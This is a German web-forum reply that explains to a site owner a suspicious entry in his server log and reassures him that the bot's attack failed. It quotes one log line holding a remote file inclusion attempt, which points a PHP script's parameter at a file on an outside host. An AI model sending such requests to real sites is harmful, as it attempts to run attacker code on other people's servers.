hallo,

Sven Rautenberg hat dir inzwischen ja auch einen großen Teil deiner Besorgnis genommen.

"GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/ppll2/romania.txt?? HTTP/1.1" 302 304 "-" "libwww-perl/5.803" 181 524

Hm. Da ist das "//" ganz am Anfang etwas irritierend. Ansonst: der Server hat "302" als Statuscode zurückgeliefert. Das ist lustig, aber kein Grund zur Besorgnis.

Was passiert denn da eigentlich?

Ganz kurz und schematisch: da versucht irgendein "bot", Schwachstellen deiner vermeintlich eingesetzten Scripts auszunutzen. Du hast aber solche Scripts gar nicht, also läuft sich der "bot" bei dir tot - aber vielleicht hat er an irgendeienr anderen Stelle im Internet doch Erfolg.

Der Aufruf wird an www.freewebtown.com weitergeleitet. Und? Was passiert auf meinem Server?

Es wird versucht, die Ausführung eines "Scripts" von deinem Server bzw. von deiner Seite aus zu ermöglichen. Das funktinoiert bloß nicht.

Was kann/sollte ich dagegen tun?

Nichts. Du kannst den "bot" ruhig auslachen, da er bei dir nichts Wirksames erreicht.

Ich habe solche Eintragungen in den logs jeden Tag mehrfach - auch bei SELFHTML dürfte es sie zu vielen Dutzend am Tag geben. Und übrigens gibt es im Forums-Archiv auch allerhand Threads zu diesem Thema, aber ich bin jetzt zu faul, die herauszusuchen.

Derzeit mußt du dir also noch überhaupt keine Sorgen machen. Aber du hast vermutlich gelernt, daß es wichtig sein kann, die Serverlogs zu beobachten, und _das_ist tatsächlich wichtig. Wenn es wirklich irgendeinen "Angriff" gibt, siehst du das an den logs auch. Jetzt mußt du bloß noch verstehen lernen, was deine logs wirklich aussagen.

Grüße aus Berlin

Christoph S.